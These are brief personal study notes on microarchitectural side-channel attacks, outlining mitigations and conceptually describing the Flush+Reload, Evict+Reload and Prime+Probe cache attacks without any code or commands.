My notes:
Microarchitectural Attacks
By making indirect observations one is able to infer partial information.
Communication should not be possible, following system semantics. The communication medium is not designed to be a communication channel.
Micro-arch events: timing, performance, counters, etc.
Mitigations:
- Data-oblivious execution and constant-time programming.
- Making disjoint channels makes communication impossible.
- Add noise.
Cache attacks
- Flush+Reload: with shared memory, the flush instructions allow explicit control of cache states for crash recovery. The attacker flushes the cache, the victim executes, then if the attacker reload of a cache line is fast, it means that the victim accessed that cache line.
- Evict+Reload: if the flush instruction is not available, the attacker can access a lot of data to evict the data from the cache.
- Prime+Probe: without shared memory, the attacker can fill a cache set with their data, and probe what data remains after the victim execution.
Cache attacks are hard due to page sharing, noise due to prefetchers, uncertainty due to page mapping, replacement policy, etc.
Hardware and software optimizations make attacks easier: transparent page sharing, copy-on-write, huge pages, virtually-indexed and physically-tagged caches.